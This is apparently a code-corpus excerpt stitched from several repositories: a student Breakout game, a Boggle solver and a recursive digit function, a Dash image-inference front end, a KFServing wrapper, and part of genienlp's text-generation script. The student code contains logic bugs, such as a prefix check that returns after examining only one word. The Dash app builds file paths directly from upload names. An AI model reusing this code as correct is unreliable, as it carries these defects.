self.ball = GOval(ball_radius,ball_radius)
self.ball.filled = True
self.ball.fill_color = "darkred"
self.window.add(self.ball,self.window.width/2, self.window.height-PADDLE_OFFSET-PADDLE_HEIGHT)
self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = random.randint(2,INITIAL_Y_SPEED)
self.paddle_offset = PADDLE_OFFSET
self.live = lives
self.frame_rate = FRAME_RATE
i = 0
j = 0
while i < 11 and j <10: #this part is for making bricks, through two variables, I stimulate the row and columns of bricks
if i < 10:
brick_i = GRect(brick_width, brick_height)
self.window.add(brick_i, x=0 + i *( brick_width + brick_spacing), y=brick_offset + j* (brick_height + brick_spacing))
if j < 2:
brick_i.filled = True
brick_i.fill_color = "red"
elif j < 4:
brick_i.filled = True
brick_i.fill_color = "orange"
elif j < 6:
brick_i.filled = True
brick_i.fill_color = "yellow"
elif j < 8:
brick_i.filled = True
brick_i.fill_color = "green"
elif j < 10:
brick_i.filled = True
brick_i.fill_color = "blue"
i += 1
elif i == 10:
j += 1
i = 0
elif j == 10:
break
onmousemoved(self.paddle_move)
onmouseclicked(self.ball_move)
def ball_move(self,event):
if self.ball.x == self.window.width/2 and self.ball.y == self.window.height-self.paddle_height-PADDLE_OFFSET:
while self.live >0:
pause(self.frame_rate)
self.detect_object()
self.ball.move(self.__dx,self.__dy)
if self.ball.x >= self.window.width or self.ball.x <= 0:
self.__dx = - self.__dx
elif self.ball.y <= 0:
self.__dy = - self.__dy
elif self.ball.y >= self.window.height:
self.live -= 1
break
self.reset_ball_position()
#self.window.add(self.ball,self.window.width/2 , self.window.height-self.paddle_height-PADDLE_OFFSET)
"""
def ball_move_velocity(self):
self.dx = random.randint(1, MAX_X_SPEED)
self.dy = random.randint(2, INITIAL_Y_SPEED)
if (random.random()) > 0.5:
self.dx = -self.dx
if (random.random()) > 0.5:
self.dy = -self.dy
self.ball.move(self.dx,self.dy)
"""
def paddle_move(self, event):
"""
this function is for onmousemoved
to create a moving paddle
"""
self.paddle.x = event.x - self.paddle.width/2
self.paddle.y = self.window.height -PADDLE_OFFSET
def detect_object(self):
"""
this function is built to sense the brick and the paddle correcrtly
"""
obj_left_up = self.window.get_object_at(self.ball.x,self.ball.y) #左上角
obj_left_down = self.window.get_object_at(self.ball.x, self.ball.y +2 * BALL_RADIUS)
obj_right_up = self.window.get_object_at(self.ball.x + 2 * BALL_RADIUS, self.ball.y)
obj_right_down = self.window.get_object_at(self.ball.x + 2 * BALL_RADIUS, self.ball.y +2 * BALL_RADIUS)
if self.ball.y < self.window.height - PADDLE_OFFSET- 2*self.paddle_height:
#if obj_right_down is None and obj_left_down is None:
if obj_left_up is not None:
self.__dy = -self.__dy
self.remove_stuff(obj_left_up)
if obj_right_up is not None:
self.remove_stuff(obj_right_up)
#if obj_right_up is None and obj_left_up is None:
if obj_left_down is not None:
self.remove_stuff(obj_left_down)
self.__dy = -self.__dy
if obj_right_down is not None:
self.remove_stuff(obj_right_down)
#if obj_right_up is None and obj_right_down is None:
if obj_left_up is not None:
self.remove_stuff(obj_left_up)
self.__dx = -self.__dx
if obj_left_down is not None:
self.remove_stuff(obj_left_down)
#if obj_left_up is None and obj_left_down is None:
if obj_right_up is not None:
self.remove_stuff(obj_right_up)
self.__dx = -self.__dx
if obj_right_down is not None:
self.remove_stuff(obj_right_down)
if self.ball.y >= self.window.height - PADDLE_OFFSET- self.paddle_height:
if obj_left_down is not None or obj_right_down is not None:
self.__dy = -self.__dy
def remove_stuff(self, obj):
self.window.remove(obj)
def reset_ball(self):
""""
if the ball drops beneath window.height, we will reset the ball
"""
self.reset_ball_position()
def reset_ball_position(self):
"""
and we need to reset the position of the ball
"""
self.ball.x = self.window.width/2
self.ball.y = self.window.height-PADDLE_OFFSET-PADDLE_HEIGHT
def reset_ball_velocity(self):
"""
reset the ball velocity also
"""
self.__dx = random.randint(2,MAX_X_SPEED)
self.__dy = INITIAL_Y_SPEED
if (random.random()) > 0.5:
self.__dx = -self.__dx
# self.ball = GOval(ball_radius,ball_radius)
#self.ball.filled = True
#self.ball.fill_color = "darkred"
#self.window.add(self.ball,self.window.width/2, self.window.height-PADDLE_OFFSET-PADDLE_HEIGHT)
# Center a filled ball in the graphical window.
# Default initial velocity for the ball.
# Initialize our mouse listeners.
# Draw bricks.
```
#### File: SC101-projects/SC101_Assignment5/boggle.py
```python
FILE = 'dictionary.txt'
Python_List = []
Count = 0
Found_List = []
def main():
"""
TODO:
"""
i = 0
row = []
for i in range(0,4):
row_i = input(f"{i+1} row of letter:").lower()
row_i = list(row_i)
row.append(row_i)
if len(row_i) != 4: # let's first forget about the blank issue
print("Illegal input")
else:
i += 1
read_dictionary()
boggle(row)
print(f"There are {len(Found_List)} words in total!")
print("done searching yaya ")
def read_dictionary():
"""
This function reads file "dictionary.txt" stored in FILE
and appends words in each line into a Python list
"""
global Python_List
with open(FILE, "r") as f:
for word in f:
word = word.strip("\n")
Python_List.append(word)
def boggle(row):
print("searching...")
for i in range(4): # 做出一個對應4*4的座標系統
for j in range(4):
boggle_helper(row, [i, j], [], "", i, j)
def boggle_helper(row, used_position, used_position_list, cur_str, x, y):
global Found_List
used_position_list.append(used_position)
if cur_str in Python_List and len(cur_str) >= 4: # base case
if cur_str not in Found_List:
Found_List.append(cur_str)
print(f"Found: {cur_str}")
boggle_helper(row, [x, y], used_position_list, cur_str, x, y)
used_position_list.pop() # 找到字以後記得要把它的位置退掉,要不然就不能找其他的
for i in range(-1, 2): # recursive case (不用else: 所以就算是找到room,他還是會繼續找其他的而不會就停下來)
for j in range(-1, 2):
new_x = x + i
new_y = y + j
if len(cur_str) == 0: # 找新的字母把做開頭的時候
cur_str += row[x][y]
if [new_x, new_y] not in used_position_list: # 代表新的new_x, new_y沒有走回之前的老路
if 0 <= new_x < 4 and 0 <= new_y < 4:
cur_str += row[new_x][new_y] # 把新的字母家在原本就有的字母之後
if has_prefix(cur_str) == True: # 測試一下cur_str開頭的字存不存在
boggle_helper(row, [new_x, new_y], used_position_list, cur_str, new_x, new_y) # 存在的話繼續找新鄰居試試看
cur_str = cur_str[:len(cur_str) - 1] # 要backtracking,把原本的字母退掉
used_position_list.pop() # 把之前那個字母的位置從used_position_list裡面退掉
else:
cur_str = cur_str[:len(cur_str)-1] # 不存在的話把原本的這個字母退掉
def has_prefix(sub_s):
global Count
for word in Python_List[:]:
if word.startswith(sub_s) == True:
return True
else:
return False
if __name__ == '__main__':
main()
```
#### File: SC101-projects/SC101_Assignment5/largest_digit.py
```python
largest_digit = 0
def main():
#print(find_largest_digit(12345)) # 5
print(find_largest_digit(281)) # 8
#print(find_largest_digit(6)) # 6
#print(find_largest_digit(-111)) # 1
#print(find_largest_digit(-9453)) # 9
def find_largest_digit(n):
#global largest_digit
#largest_digit = 0
#find_digit_helper(n)
# def find_digit_helper(n):
global largest_digit
if n == 0:
pass
else:
# 解決負數的問題
if n < 0:
n = -n
last_digit = n % 10 # 做出餘數(新尾數)
if last_digit > largest_digit: # 新尾數跟之前的舊尾數比大小
largest_digit = last_digit
find_largest_digit(n//10)
return largest_digit
if __name__ == '__main__':
main()
``` |
{
"source": "JonathanChiang/DashNeuro",
"score": 3
} |
#### File: JonathanChiang/DashNeuro/app_table.py
```python
import dash
import dash_table
import pandas as pd
from dash.dependencies import Input, Output, State
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import os
# USAGE
# python simple_request.py
# import the necessary packages
import requests
# initialize the Keras REST API endpoint URL along with the input
# image path
KERAS_REST_API_URL = "http://localhost:5000/predict"
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
app = dash.Dash( external_stylesheets=[dbc.themes.BOOTSTRAP])
app.css.config.serve_locally = True
app.scripts.config.serve_locally = True
app.layout = html.Div([
dcc.Upload(
id='upload-data',
children=html.Div([
html.A('Run Inference')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center'
},
multiple=False
),
html.Div(id='output-data-upload')
])
@app.callback(dash.dependencies.Output('output-data-upload', 'children'),
[dash.dependencies.Input('upload-data', 'contents'),
dash.dependencies.Input('upload-data', 'filename')])
def update_output(contents, filename):
if contents is not None:
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = "/images/" + filename
IMAGE_PATH = script_dir + rel_path
# load the input image and construct the payload for the request
image = open(IMAGE_PATH, "rb").read()
payload = {"image": image}
# submit the request
r = requests.post(KERAS_REST_API_URL, files=payload).json()
# ensure the request was sucessful
if r["success"]:
# loop over the predictions and display them
df = pd.json_normalize(r["predictions"])
df["probability"] = 100 * df["probability"]
df = df.round({'probability': 2})
df = df.rename(str.upper, axis='columns')
return html.Div([
html.Hr(),
html.Img(src=contents),
html.Hr(),
dash_table.DataTable(
id='table',
columns=[{"name": i, "id": i} for i in df.columns],
data=df.to_dict("rows"),
style_cell={'width': '25px',
'fontSize':20,
'font-family':'sans-serif',
'height': '50px',
'color' : 'black',
'textAlign': 'center'}
),
],style={'columnCount': 1})
# otherwise, the request failed
else:
print("Request failed")
if __name__ == "__main__":
app.run_server(debug=True,threaded=True)
``` |
{
"source": "Jonathan-Chin328/genienlp",
"score": 2
} |
#### File: genienlp/genienlp/kfserver.py
```python
import logging
import kfserving
from .util import log_model_size
from .server import Server, init
logger = logging.getLogger(__name__)
class KFModelServer(kfserving.KFModel):
def __init__(self, name, args, numericalizer, model, device, confidence_estimator):
super().__init__(name)
self.server = Server(args, numericalizer, model, device, confidence_estimator)
def load(self):
log_model_size(logger, self.server.model, self.server.args.model)
self.server.model.to(self.server.device)
self.server.model.eval()
self.ready = True
def predict(self, request):
results = self.server.handle_request(request)
return {"predictions": results}
def main(args):
model, device, confidence_estimator = init(args)
model_server = KFModelServer(args.inference_name, args, model.numericalizer, model, device, confidence_estimator)
model_server.load()
kfserving.KFServer(workers=1).start([model_server])
```
#### File: genienlp/paraphrase/run_generation.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import math
import json
import re
import copy
import os
import numpy as np
# multiprocessing with CUDA
from torch.multiprocessing import Process, set_start_method
from genienlp.paraphrase.data_utils import create_features_from_tsv_file, output_heuristics
from genienlp.paraphrase.model_utils import compute_metrics, compute_attention, replace_quoted_params, force_replace_quoted_params
from ..tasks.almond_utils import tokenize_cjk_chars
from ..data_utils.progbar import prange
try:
set_start_method('spawn')
except RuntimeError:
pass
import torch
from transformers import GPT2_PRETRAINED_CONFIG_ARCHIVE_MAP, T5_PRETRAINED_CONFIG_ARCHIVE_MAP
from .transformers_utils import BART_PRETRAINED_CONFIG_ARCHIVE_MAP, MARIAN_PRETRAINED_CONFIG_ARCHIVE_MAP
from transformers import GPT2Tokenizer, T5Tokenizer, MarianTokenizer, BartTokenizer
from .transformers_utils import GenieMarianMTModel, GenieBartForConditionalGeneration, GenieMBartForConditionalGeneration,\
GenieT5ForConditionalGeneration, GenieMT5ForConditionalGeneration
from .transformers_utils import GenieMBartTokenizer
from transformers import PretrainedConfig
from ..util import set_seed, combine_files_on_disk, split_file_on_disk, get_part_path
from .GPT2Seq2Seq import GPT2Seq2Seq
from .data_utils import group_together
from .model_utils import check_args
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
ALL_MODELS = sum((tuple(map.keys()) for map in (GPT2_PRETRAINED_CONFIG_ARCHIVE_MAP, T5_PRETRAINED_CONFIG_ARCHIVE_MAP,
BART_PRETRAINED_CONFIG_ARCHIVE_MAP, MARIAN_PRETRAINED_CONFIG_ARCHIVE_MAP)), ())
MODEL_CLASSES = {
'gpt2': (GPT2Seq2Seq, GPT2Tokenizer, {'bos_token': '<unk>', 'sep_token': '<paraphrase>', 'eos_token': '</paraphrase>'}),
't5': (GenieT5ForConditionalGeneration, T5Tokenizer, {'bos_token': '<unk>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'mt5': (GenieMT5ForConditionalGeneration, T5Tokenizer, {'bos_token': '<unk>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'bart': (GenieBartForConditionalGeneration, BartTokenizer, {'bos_token': '<s>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'mbart': (GenieMBartForConditionalGeneration, GenieMBartTokenizer, {'bos_token': '<s>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'marian': (GenieMarianMTModel, MarianTokenizer, {'bos_token': '<unk>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
}
def parse_argv(parser):
parser.add_argument("--model_name_or_path", default=None, type=str, required=True,
help="Path to pre-trained model or shortcut name selected in the list: " + ", ".join(ALL_MODELS))
parser.add_argument("--input_file", type=str, help="The file from which we read prompts. Defaults to stdin.")
parser.add_argument('--input_column', type=int, required=True,
help='The column in the input file which contains the input sentences.')
parser.add_argument('--prompt_column', type=int, default=None,
help='The column in the input file which contains the text we should start generation from.')
parser.add_argument('--gold_column', type=int, default=None,
help='The column in the input file which contains the gold sentences. Defaults to --input_column if no gold is available.')
parser.add_argument('--thingtalk_column', type=int, default=None,
help='The column in the input file which contains the ThingTalk program.')
parser.add_argument('--id_column', type=int, default=None,
help='The column in the input file which contains the example ID.')
parser.add_argument("--output_file", type=str, help="When specified, generated text will be written in this file. Defaults to stdout.")
parser.add_argument("--intermediate_file", type=str, default='./paraphrase_tmp.tsv', help="Used to save intermediate results.")
parser.add_argument('--output_prompt', action='store_true',
help='Whether we should include the prompt (specified via --prompt_column or --copy) in the output sequence')
parser.add_argument("--length", type=int, default=15, help='The generated sentences will have a maximum length of len(input) + arg.length')
parser.add_argument("--min_output_length", type=int, default=2, help='Will prevent stop tokens from appearing in the first --min_output_length tokens of the generated sentences.')
parser.add_argument("--skip_heuristics", action='store_true', help='If True, will not replace special word such as NUMBER_0 in the input.')
parser.add_argument("--is_cased", action='store_true',
help='If True, the trained model is cased, so if --skip_heuristics is not set, we will convert the input to upper case and the output back to lower case.')
parser.add_argument("--metric_reduction", type=str, choices=['average', 'max'], default='average',
help="How we should calculate metrics where there are multiple generations per example.")
parser.add_argument("--shuffle_input", action='store_true', help='If set, we will shuffle input dataset before processing it'
'Used mainly with subsampling so we take different portion of data each time')
parser.add_argument("--pipe_mode", action='store_true', help='If set, we will generate paraphrases of paraphrases of ... as well.')
# These are generation hyperparameters. Each one can be a list of values in which case, we generate num_samples outputs for each set of hyperparameters.
parser.add_argument("--num_samples", type=int, nargs='+', default=[1])
parser.add_argument("--temperature", type=float, nargs='+', default=[1.0],
help="temperature of 0 implies greedy sampling")
parser.add_argument("--repetition_penalty", type=float, nargs='+', default=[1.0],
help="primarily useful for CTRL model; in that case, use 1.2")
parser.add_argument("--top_k", type=int, nargs='+', default=[0], help='0 disables top-k filtering')
parser.add_argument("--top_p", type=float, nargs='+', default=[0.9], help='1.0 disables top-p filtering')
parser.add_argument("--num_beams", type=int, nargs='+', default=[1], help='1 disables beam seach')
parser.add_argument("--no_repeat_ngram_size", type=int, nargs='+', default=[0], help='ngrams of this size cannot be repeated in the output. 0 disables it.')
parser.add_argument("--copy", type=int, default=0,
help='Number of tokens that will be copied at the beginning of generation. Helps preserve the original meaning of the input sequence.')
parser.add_argument("--no_cuda", action='store_true',
help="Avoid using CUDA when available")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
parser.add_argument('--stop_tokens', type=str, nargs='+', default=[],
help="Tokens (other than the model-specific `eos_token`) at which text generation should be stopped.")
parser.add_argument('--batch_size', type=int, default=4,
help="Batch size for text generation for each GPU.")
parser.add_argument('--pad_token', type=str, default='<pad>',
help='The special token for padding, if tokenizer does not have that')
parser.add_argument('--cache_dir', default='.embeddings', type=str, help='where to save transforemrs cached models, configs, and tokenizers.')
parser.add_argument('--trained_model_type', type=str, help='if provided we make sure the loaded model matches the model_type')
parser.add_argument('--src_lang', type=str, help='source language used for translation task')
parser.add_argument('--tgt_lang', type=str, help='target language used for translation task')
parser.add_argument('--output_attentions', action='store_true', help='return self and cross attention weights for seq2seq models')
parser.add_argument('--output_hidden_states', action='store_true', help='return all hidden states for seq2seq models')
parser.add_argument('--att_pooling', type=str, default='max', help='pooling used to calculate decoder-encoder attention values across different heads')
parser.add_argument('--plot_heatmaps', action='store_true', help='whether to plot decoder-encoder attention heatmaps')
parser.add_argument('--replace_qp', action='store_true', help='replace parameter values after translation with source values')
parser.add_argument('--force_replace_qp', action='store_true', help='if we parameters could not be replaced leveraging quotation marks,'
' rely purely on attention to find text spans')
parser.add_argument('--subsample', type=int, default=20000000, help='subsample input datasets')
parser.add_argument('--task', type=str, required=True, choices=['paraphrase', 'translate'])
parser.add_argument("--output_example_ids_too", action='store_true', help='Generate two column output with ids in the first column')
parser.add_argument('--mask_tokens', action='store_true', help='mask input tokens and infill them using denoising pretrained model')
parser.add_argument('--mask_token_prob', type=float, default=0.15, help='Probability of an input token being masked in the sentence')
parser.add_argument('--delete_tokens', action='store_true', help='delete input tokens and infill them using denoising pretrained model'
'In contrast to token masking, the model should decide which positions have missing inputs')
parser.add_argument('--delete_token_prob', type=float, default=0.15, help='Probability of an input token being deleted in the sentence')
parser.add_argument('--infill_text', action='store_true', help='mask consecutive tokens and infill them using denoising pretrained model')
parser.add_argument('--num_text_spans', type=int, default=3, help='number of text spans to sample for text infilling method')
parser.add_argument('--infill_max_tries', type=int, default=3, help='Maximum number of tries to find an appropriate span')
parser.add_argument('--permute_sentences', action='store_true', help='divide document into sentences based on fill stops and'
'permutate them. Use this only if input has multiple sentences.')
parser.add_argument('--rotate_sentence', action='store_true', help='a pivot token is chosen randomly, and sentence is rotated so new sentence start with pivot token')
parser.add_argument('--fp16', action='store_true',
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit. On certain GPUs (e.g. Nvidia V100) improves the inference speed")
parser.add_argument('--fp16_opt_level', type=str, default='O1',
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html")
parser.add_argument('--verbose', action='store_true', help='log additional information for debugging purposes')
parser.add_argument('--no_fast_tokenizer', action='store_true', help='Use slow version of huggingface tokenizer')
def main(args):
hyperparameters = ['num_samples', 'temperature', 'top_k', 'top_p', 'repetition_penalty', 'num_beams', 'no_repeat_ngram_size']
max_hyperparameter_len = max([len(getattr(args, h)) for h in hyperparameters])
valid_len = [1, max_hyperparameter_len]
for h in hyperparameters:
if (len(getattr(args, h)) not in valid_len):
logger.error('Hyperparameters should either have the same number of values as others or have exactly one value.')
# If only one value is provided, use the same value for all samples
setattr(args, h, getattr(args, h) * (max_hyperparameter_len // len(getattr(args, h))))
logger.info('Will output %d sequences for each input.', sum(args.num_samples)if not args.pipe_mode else np.prod(args.num_samples))
logger.info('Effective batch size for each GPU is %d', args.batch_size*max(args.num_samples))
# TODO using intermediate files for pipe_mode is not clean. It needs to change.
if args.pipe_mode:
intermediate_files = [args.input_file] + [args.intermediate_file+str(i) for i in range(max_hyperparameter_len)]
for i in range(max_hyperparameter_len):
copy_args = copy.copy(args)
for h in hyperparameters:
setattr(copy_args, h, [getattr(args, h)[i]])
copy_args.input_file = intermediate_files[i]
copy_args.output_file = intermediate_files[i+1]
run_multi_process_generation(copy_args)
all_outputs = group_together(intermediate_files[1:], args.num_samples)
for file_path in intermediate_files[1:]:
os.remove(file_path)
if args.output_file is not None:
if not os.path.exists(os.path.dirname(args.output_file)):
os.makedirs(os.path.dirname(args.output_file), exist_ok=False)
with open(args.output_file, 'w') as output_file:
for output in all_outputs:
for text in output:
output_file.write(text + '\n')
else:
print(json.dumps(all_outputs, indent=2))
else:
run_multi_process_generation(args)
def run_multi_process_generation(args):
config = PretrainedConfig.from_pretrained(args.model_name_or_path, cache_dir=args.cache_dir)
# get model type from saved config
if hasattr(config, 'model_type'):
args.model_type = getattr(config, 'model_type')
else:
raise ValueError('Model should be either GPT2, BART, MBART, or Marian')
# check arguments validity
check_args(args)
if sum([args.mask_tokens, args.delete_tokens, args.infill_text, args.permute_sentences, args.rotate_sentence]) >= 2:
raise ValueError('Mixing denoising techniques is unlikely to work. Please use one method per run')
if (args.mask_tokens or args.delete_tokens or args.rotate_sentence) and args.model_type == 'mbart':
raise ValueError('MBART is pretrained only with text_infilling and permute_sentences noising methods. '
'Applying other noising techniques is unlikely to work')
if args.trained_model_type and args.trained_model_type != '' and args.model_type != args.trained_model_type:
raise ValueError('The loaded model type does not match with what the user provided')
if args.prompt_column is not None and args.copy is not None and args.copy != 0:
raise ValueError('Cannot copy from the input and use prompt at the same time. Disable either --copy or --prompt_column.')
if args.gold_column is None:
args.gold_column = args.input_column
args.device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
if args.output_file is not None:
if not os.path.exists(os.path.dirname(args.output_file)):
os.makedirs(os.path.dirname(args.output_file), exist_ok=False)
set_seed(args)
if args.n_gpu > 1:
if args.input_file is None:
raise ValueError('Cannot use multiple GPUs when reading from stdin. You should provide an --input_file')
logger.info('Running generation in parallel on {} GPUs'.format(args.n_gpu))
# Independent multi-GPU generation
all_processes = []
all_input_files = split_file_on_disk(args.input_file, args.n_gpu)
for gpu_idx in range(args.n_gpu):
copy_args = copy.copy(args)
if torch.cuda.is_available() and not args.no_cuda:
copy_args.device = torch.device("cuda:" + str(gpu_idx))
copy_args.n_gpu = 1
copy_args.input_file = all_input_files[gpu_idx]
copy_args.output_file = get_part_path(args.output_file, gpu_idx)
p = Process(target=run_single_process_generation, args=(copy_args, config))
all_processes.append(p)
p.start()
for p in all_processes:
p.join()
for file in all_input_files:
os.remove(file)
combine_files_on_disk(args.output_file, args.n_gpu, line_group_size=sum(args.num_samples), delete=True)
else:
run_single_process_generation(args, config)
def run_single_process_generation(args, config):
model_class, tokenizer_class, special_tokens = MODEL_CLASSES[args.model_type]
output_attentions = args.output_attentions
output_hidden_states = args.output_hidden_states
model = model_class.from_pretrained(args.model_name_or_path,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
cache_dir=args.cache_dir)
model.to(args.device)
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model = amp.initialize(model, opt_level=args.fp16_opt_level)
model.eval()
tokenizer = tokenizer_class.from_pretrained(args.model_name_or_path, cache_dir=args.cache_dir, use_fast=not args.no_fast_tokenizer)
eos_token_id = tokenizer.convert_tokens_to_ids(special_tokens['eos_token'])
sep_token_id = tokenizer.convert_tokens_to_ids(special_tokens['sep_token'])
if tokenizer.pad_token is None:
# this assigns pad token but doesn't add it to the vocabulary
tokenizer.pad_token = args.pad_token
pad_token_id = tokenizer.convert_tokens_to_ids(tokenizer.pad_token)
if pad_token_id is None:
logger.error('Your tokenizer does not have a padding token')
if args.model_type == 'gpt2':
model.set_token_ids(eos_token_id=eos_token_id,
sep_token_id=sep_token_id,
pad_token_id=pad_token_id)
logger.info(args)
model_input_prefix = ''
if args.model_type == 'marian' and args.tgt_lang:
# TODO check if extra space after pattern is necessary
model_input_prefix = '>>{}<< '.format(args.tgt_lang)
elif args.model_type == 't5':
if args.task == 'translate':
t5_task = 'translation_{}_to_{}'.format(args.src_lang, args.tgt_lang)
else:
t5_task = 'summarization'
model_input_prefix = config.task_specific_params[t5_task]['prefix']
masking_token = getattr(tokenizer, 'mask_token', '<mask>')
all_input_sequences, all_input_sequence_lengths, all_example_ids, all_context_ids, estimated_output_lengths, all_golds, reverse_maps, all_prompt_ids = \
create_features_from_tsv_file(file_path=args.input_file,
tokenizer=tokenizer,
input_column=args.input_column,
gold_column=args.gold_column,
id_column=args.id_column,
prompt_column=args.prompt_column,
thingtalk_column=args.thingtalk_column,
copy=args.copy,
sep_token_id=sep_token_id,
skip_heuristics=args.skip_heuristics,
is_cased=args.is_cased,
model_type=args.model_type,
src_lang=args.src_lang,
subsample=args.subsample,
shuffle_input=args.shuffle_input,
task=args.task,
model_input_prefix=model_input_prefix,
mask_tokens=args.mask_tokens,
mask_token_prob=args.mask_token_prob,
masking_token=masking_token,
infill_max_tries=args.infill_max_tries,
delete_tokens=args.delete_tokens,
delete_token_prob=args.delete_token_prob,
infill_text=args.infill_text,
num_text_spans=args.num_text_spans,
permute_sentences=args.permute_sentences,
rotate_sentence=args.rotate_sentence)
# sort contexts based on their context length so that less generated tokens are thrown away and generation can be done faster
estimated_output_lengths, all_input_sequence_lengths, all_input_sequences, all_context_ids, original_order, reverse_maps, all_prompt_ids = \
tuple(zip(*sorted(list(zip(estimated_output_lengths, all_input_sequence_lengths, all_input_sequences, all_context_ids, range(len(all_context_ids)), reverse_maps, all_prompt_ids)), reverse=True)))
all_outputs = []
stop_token_ids = [tokenizer.convert_tokens_to_ids(stop_token) for stop_token in args.stop_tokens]
batch_idx = 0
for batch in prange(math.ceil(len(all_context_ids) / args.batch_size)):
batch_slice = (batch*args.batch_size, min((batch+1)*args.batch_size, len(all_context_ids)))
batch_size = batch_slice[1] - batch_slice[0]
batch_context_tokens = all_context_ids[batch_slice[0]: batch_slice[1]]
batch_reverse_maps = reverse_maps[batch_slice[0]: batch_slice[1]]
batch_prompt_tokens = all_prompt_ids[batch_slice[0]: batch_slice[1]]
if args.model_type == 'gpt2':
batch_context_tensor = torch.tensor(model.pad_to_max_length(batch_context_tokens), dtype=torch.long, device=args.device)
attention_mask = None
else:
padded_batch_context_tokens = []
max_length = max([len(s) for s in batch_context_tokens])
for i in range(len(batch_context_tokens)):
padded_batch_context_tokens.append(batch_context_tokens[i]+[pad_token_id]*(max_length-len(batch_context_tokens[i])))
batch_context_tensor = torch.tensor(padded_batch_context_tokens, dtype=torch.long, device=args.device)
attention_mask = (batch_context_tensor!=pad_token_id).to(torch.long)
if args.model_type == 'mbart':
decoder_start_token_id = tokenizer.lang_code_to_id[args.tgt_lang]
model.config.decoder_start_token_id = decoder_start_token_id
else:
decoder_start_token_id = None
max_length = batch_context_tensor.shape[1] + args.length
all_encoder_attentions = None
batch_outputs = [[] for _ in range(batch_size)]
for hyperparameter_idx in range(len(args.temperature)):
outputs = model.generate(input_ids=batch_context_tensor,
bad_words_ids=None,
attention_mask=attention_mask,
decoder_start_token_id=decoder_start_token_id,
min_length=args.min_output_length,
max_length=max_length,
num_beams=args.num_beams[hyperparameter_idx],
top_k=args.top_k[hyperparameter_idx],
top_p=args.top_p[hyperparameter_idx],
early_stopping=True,
num_return_sequences=args.num_samples[hyperparameter_idx],
repetition_penalty=args.repetition_penalty[hyperparameter_idx],
no_repeat_ngram_size=args.no_repeat_ngram_size[hyperparameter_idx],
do_sample=args.temperature[hyperparameter_idx]!=0,
temperature=args.temperature[hyperparameter_idx] if args.temperature[hyperparameter_idx] > 0 else 1.0, # if temperature==0, we do not sample
eos_token_id=eos_token_id,
pad_token_id=pad_token_id,
use_cache=True,
output_attentions=output_attentions
)
# TODO fix the way output attention is handled. Some models do not support it.
if output_attentions:
decoded, all_encoder_attentions = outputs
else:
decoded = outputs
if not isinstance(decoded, list):
decoded = decoded[:, :].tolist()
for i, out in enumerate(decoded):
if args.model_type=='bart' or args.model_type=='mbart':
out = out[1:] # remove </s> token at the beginning
sample_index = (i//args.num_samples[hyperparameter_idx]) % batch_size
if not args.output_prompt:
out = out[len(batch_prompt_tokens[sample_index]):]
min_index = len(out)-1
for stop_token_id in stop_token_ids+[eos_token_id]:
try:
index = out.index(stop_token_id)
min_index = min(index, min_index)
except ValueError:
pass
### include eos_token too; it will get removed during decoding
min_index = min_index + 1
out_cropped = out[:min_index]
if args.task == 'translate' and output_attentions:
src_tokens = tokenizer.convert_ids_to_tokens(batch_context_tensor[sample_index])
tgt_tokens = tokenizer.convert_ids_to_tokens(out_cropped)
# get last layer attention vectors
layer_attention = all_encoder_attentions[-1]
sample_layer_attention = layer_attention[sample_index, :, :, :]
if tgt_tokens[0] in [tokenizer.pad_token, special_tokens['bos_token'], special_tokens['sep_token']] or \
(decoder_start_token_id and tgt_tokens[0] == tokenizer.id_to_lang_code[decoder_start_token_id]):
# shift target tokens left to match the attention positions
tgt_tokens = tgt_tokens[1:]
while src_tokens[-1] == tokenizer.pad_token:
# remove all padding from src
src_tokens = src_tokens[:-1]
if src_tokens[-1] == special_tokens['sep_token']:
# remove trailing sep token
src_tokens = src_tokens[:-1]
if src_tokens[-1] == special_tokens['eos_token']:
# remove end token for better heatmap representation
src_tokens = src_tokens[:-1]
# remove language code from the beginning of src_tokens and shift layer_attention
len_prefix_wp = len(tokenizer.tokenize(model_input_prefix))
src_tokens = src_tokens[len_prefix_wp:]
sample_layer_attention = sample_layer_attention[:, :, len_prefix_wp:]
# crop to match src and tgt new lengths
sample_layer_attention = sample_layer_attention[:, :len(tgt_tokens), :len(src_tokens)]
sample_layer_attention_pooled = compute_attention(sample_layer_attention, args.att_pooling)
if args.plot_heatmaps:
import matplotlib.pyplot as plt
import seaborn as sns
src_tokens = [token.lower() for token in src_tokens]
tgt_tokens = [token.lower() for token in tgt_tokens]
g = sns.heatmap(torch.log(sample_layer_attention_pooled), xticklabels=src_tokens,
yticklabels=tgt_tokens)
g.set_xticklabels(g.get_xmajorticklabels(), fontsize=12)
g.set_yticklabels(g.get_ymajorticklabels(), fontsize=12)
if args.output_file is not None:
plt.savefig(os.path.join(os.path.dirname(args.output_file),
'heatmap_{}'.format(batch_idx * batch_size + i)))
plt.show()
# remove end token if present
if tgt_tokens[-1] in [special_tokens['bos_token'], special_tokens['eos_token']]:
tgt_tokens = tgt_tokens[:-1]
if args.replace_qp:
tgt_lang = args.tgt_lang if args.tgt_lang else args.model_name_or_path.rsplit('-', 1)[1]
